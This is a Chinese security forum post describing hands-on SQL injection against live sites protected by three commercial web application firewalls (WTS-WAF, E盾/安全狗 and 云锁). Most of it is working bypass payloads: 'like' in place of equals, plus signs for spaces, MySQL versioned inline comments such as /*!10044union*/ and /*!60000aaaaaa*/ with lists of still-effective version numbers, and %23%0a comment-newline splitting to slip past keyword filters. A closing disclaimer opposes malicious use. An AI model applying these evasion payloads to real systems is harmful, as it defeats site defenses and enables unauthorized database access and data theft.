实战记一次过狗(WTS、E盾安全狗、云锁)

NinoWEI   ·   发表于 2021-12-13 15:04:12   ·   技术文章

前言

  1. 经常走夜路,总会遇到狗。体验一下过狗,以后遇到其他种类的狗,至少还能有点思路。

WTS-WAF

网站页面

WAF图标

绕过1=1

  1. like代替等号成功绕过


神奇的是 and 1空格=空格1居然也可以绕。这个waf的开发真有意思。

order by 不拦截。10个字段

union select绕过

  1. 被拦截


尝试加号代替空格,被拦截


在select后面再加个加号,成功绕过union select

database不拦截

  1. 单独select不拦截,直接通关。

总结一下

  1. union+select+1,2 waf过程可以养成加号代替空格的习惯,可能有意想不到的效果。

E盾(安全狗)

E盾图标

等号绕过

  1. and 加数字被过滤
  2. like绕过。
  3. 1 like 1不可以


-1 like -1 可以。同理-1 like 1 屏蔽原内容。

  1. 注意1 like -1也被屏蔽了。下图为正常显示画面,厚码。

order by 不拦截。6个字段。

  1. ?id=123 and -1 like -1 /*!unIon*/ select 1,2,3,4,5,6-- +

union select拦截

  1. 单独union或者select不拦截
  2. union select拦截
  3. /\*\*/内的容纳不执行,/\*\*/内联注释,里面内容执行
  4. /\*!unIon\*/ /\*!select\*/ 拦截
  5. /\*!unIon\*/ se/*!lect*/不拦截但是不显示内容
  6. /\*!10044unIon select*/ 拦截
  7. /\*!10044unIon\*/ /\*!10044select\*/不拦截,显示内容(版本号绕过,本来是/\*50001!\*/表示数据库版本>=5.00.01时就会执行。现在只有10044还可以用。)
  8. unIon%23QQQQ%0Aselect。%23是注释符#的url编码。%0A是另起一行继续上一条指令。直接上#会被E盾拦截。这里可能因为版本问题,被拦截。

database()绕过

  1. database被拦截
  2. database%23%0a() 截断换行可以



/!10044database()/不可
database/*!10044*/() 不可
database/*!10044()*/可以

from绕过

  1. 测试了一下where不拦截
  2. where /.*/ = 就拦截。用like代替等号不拦截
  3. from不拦截。select /.*/ from拦截
  4. fro%23%0am,没报错。但是不能用。完整的sql语句写出来,没有被拦截,但是不显示,也就是说语句出错。%23%0a不管在from的哪个位置都报错。同理我返回尝试database()在字母中插入截断%23%0a都无法正常显示,只有在单词跟括号中间可用。
  5. /*!11440select*/可以绕过,且正常输出

总结一下

  1. ·等号绕过用like
  2. ·过安全狗最好用的方式:内联注入!这里五位数字有些已经被狗拦截了。可以试试10440 10449 13440-13449 14400-14499 15440-15449 16440-16449 17440-17449 18440-18449这些
  3. ·截断法%23%0a不能用在字母中间

云锁

云锁图标

order by绕过,21个字段

内联注入永远的神

union select拦截

  1. 单独union,单独select不拦截
  2. union select联合拦截,内联没用。

  1. 中间放两个注释/\*\*//\*\*/也没用
  2. union/\*!60000aaaaaa\*/select可以绕过。但是这个叫什么绕过方法不知道。需要注意的,/\*!60000aaaaaa\*/是绕过union selectorder by的神器左边数字需要大于50000,后面字母乱填。

database拦截

  1. 绕过方法很简单,截断法。%23%0a在括号前截断。

from被拦截

  1. 这里首先尝试内联注入from,发现被拦截。


把select也内联注入,不拦截

总结一下

  1. 绕过union selectorder by神器 /\*60000aaaaaaa\*/。E盾也可以用。
  2. 绕过database,截断

写在最后

  1. 感兴趣的兄弟,欢迎讨论。
  2. 本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
用户名金币积分时间理由
奖励系统 100.00 0 2021-12-30 12:12:52 投稿满 10 赞奖励
奖励系统 50.00 0 2021-12-27 09:09:14 投稿满 5 赞奖励
Track-劲夫 15.00 0 2021-12-17 14:02:47 活动奖励
Track-劲夫 30.00 0 2021-12-17 14:02:40 一个受益终生的帖子~~

打赏我,让我更有动力~

3 Reply   |  Until 20天前 | 445 View

佛法僧
发表于 20天前

针不戳

评论列表

  • 加载数据中...

编写评论内容

qq806285704
发表于 20天前

针不戳

评论列表

  • 加载数据中...

编写评论内容

310011903
发表于 20天前

nice

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.